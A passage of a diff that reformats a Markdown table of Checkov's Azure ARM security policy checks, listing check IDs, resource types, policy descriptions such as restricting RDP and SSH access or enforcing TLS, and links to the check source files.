resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | -| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | -| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | -| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | -| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | -| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py) | -| 20 | CKV_AZURE_15 | resource | Microsoft.Web/sites | Ensure web app is using the latest version of TLS encryption | arm | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py) | -| 21 | CKV_AZURE_16 | resource | Microsoft.Web/sites | Ensure that Register with Azure Active Directory is enabled on App Service | arm | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py) | -| 22 | CKV_AZURE_17 | resource | Microsoft.Web/sites | Ensure the web app has 'Client Certificates (Incoming client certificates)' set | arm | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py) | -| 23 | CKV_AZURE_18 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest if used to run the web app | arm | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py) | -| 24 | CKV_AZURE_19 | resource | Microsoft.Security/pricings | Ensure that standard pricing tier is selected | arm | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py) | -| 25 | CKV_AZURE_20 | resource | Microsoft.Security/securityContacts | Ensure that security contact 'Phone number' is set | arm | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py) | -| 26 | CKV_AZURE_21 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py) | -| 27 | CKV_AZURE_22 | resource | Microsoft.Security/securityContacts | Ensure that 'Send email notification for high severity alerts' is set to 'On' | arm | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py) | -| 28 | CKV_AZURE_23 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 29 | CKV_AZURE_23 | resource | Microsoft.Sql/servers/databases | Ensure that 'Auditing' is set to 'Enabled' for SQL servers | arm | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py) | -| 30 | CKV_AZURE_24 | resource | Microsoft.Sql/servers | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers | arm | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py) | -| 31 | CKV_AZURE_25 | resource | Microsoft.Sql/servers/databases | Ensure that 'Threat Detection types' is set to 'All' | arm | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py) | -| 32 | CKV_AZURE_26 | resource | Microsoft.Sql/servers/databases | Ensure that 'Send Alerts To' is enabled for MSSQL servers | arm | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py) | -| 33 | CKV_AZURE_27 | resource | Microsoft.Sql/servers/databases | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers | arm | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py) | -| 34 | CKV_AZURE_28 | resource | Microsoft.DBforMySQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server | arm | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py) | -| 35 | CKV_AZURE_29 | resource | Microsoft.DBforPostgreSQL/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server | arm | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py) | -| 36 | CKV_AZURE_30 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 37 | CKV_AZURE_30 | resource | configurations | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py) | -| 38 | CKV_AZURE_31 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 39 | CKV_AZURE_31 | resource | configurations | Ensure configuration 'log_connections' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerLogConnectionsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogConnectionsEnabled.py) | -| 40 | CKV_AZURE_32 | resource | Microsoft.DBforPostgreSQL/servers/configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 41 | CKV_AZURE_32 | resource | configurations | Ensure server parameter 'connection_throttling' is set to 'ON' for PostgreSQL Database Server | arm | [PostgreSQLServerConnectionThrottlingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerConnectionThrottlingEnabled.py) | -| 42 | CKV_AZURE_33 | resource | Microsoft.Storage/storageAccounts/queueServices/providers/diagnosticsettings | Ensure Storage logging is enabled for Queue service for read, write and delete requests | arm | [StorageAccountLoggingQueueServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountLoggingQueueServiceEnabled.py) | -| 43 | CKV_AZURE_34 | resource | Microsoft.Storage/storageAccounts/blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 44 | CKV_AZURE_34 | resource | blobServices/containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 45 | CKV_AZURE_34 | resource | containers | Ensure that 'Public access level' is set to Private for blob containers | arm | [StorageBlobServiceContainerPrivateAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageBlobServiceContainerPrivateAccess.py) | -| 46 | CKV_AZURE_35 | resource | Microsoft.Storage/storageAccounts | Ensure default network access rule for Storage Accounts is set to deny | arm | [StorageAccountDefaultNetworkAccessDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDefaultNetworkAccessDeny.py) | -| 47 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) | -| 48 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) | -| 49 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | [MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) | -| 50 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) | -| 51 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) | -| 52 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) | -| 53 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) | -| 54 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) | -| 55 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) | -| 56 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) | -| 57 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) | -| 58 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) | -| 59 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) | -| 60 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) | -| 61 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) | -| 62 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) | -| 63 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) | -| 64 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) | -| 65 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) | -| 66 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) | -| 67 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | [MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) | -| 68 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) | -| 69 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) | -| 70 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 71 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) | -| 72 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) | -| 73 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) | -| 74 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) | -| 75 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) | -| 76 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) | -| 77 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) | -| 78 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) | -| 79 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) | -| 80 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) | -| 81 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) | -| 82 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) | -| 83 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) | -| 84 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) | -| 85 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) | -| 86 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) | -| 87 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 88 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) | -| 89 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) | -| 90 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 91 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) | -| 92 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) | -| 93 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) | -| 94 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) | +| | Id | Type | Entity | Policy | IaC | Resource Link | +|-----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| +| 0 | CKV_AZURE_1 | resource | Microsoft.Compute/virtualMachines | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead) | arm | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py) | +| 1 | CKV_AZURE_2 | resource | Microsoft.Compute/disks | Ensure Azure managed disk have encryption enabled | arm | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py) | +| 2 | CKV_AZURE_3 | resource | Microsoft.Storage/storageAccounts | Ensure that 'supportsHttpsTrafficOnly' is set to 'true' | arm | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py) | +| 3 | CKV_AZURE_4 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS logging to Azure Monitoring is Configured | arm | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py) | +| 4 | CKV_AZURE_5 | resource | Microsoft.ContainerService/managedClusters | Ensure RBAC is enabled on AKS clusters | arm | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py) | +| 5 | CKV_AZURE_6 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS has an API Server Authorized IP Ranges enabled | arm | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py) | +| 6 | CKV_AZURE_7 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster has Network Policy configured | arm | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py) | +| 7 | CKV_AZURE_8 | resource | Microsoft.ContainerService/managedClusters | Ensure Kubernetes Dashboard is disabled | arm | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py) | +| 8 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 9 | CKV_AZURE_9 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that RDP access is restricted from the internet | arm | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py) | +| 10 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 11 | CKV_AZURE_10 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that SSH access is restricted from the internet | arm | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py) | +| 12 | CKV_AZURE_11 | resource | Microsoft.Sql/servers | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP) | arm | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py) | +| 13 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 14 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/FlowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 15 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 16 | CKV_AZURE_12 | resource | Microsoft.Network/networkWatchers/flowLogs/ | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days' | arm | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py) | +| 17 | CKV_AZURE_13 | resource | Microsoft.Web/sites/config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 18 | CKV_AZURE_13 | resource | config | Ensure App Service Authentication is set on Azure App Service | arm | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py) | +| 19 | CKV_AZURE_14 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service | arm | 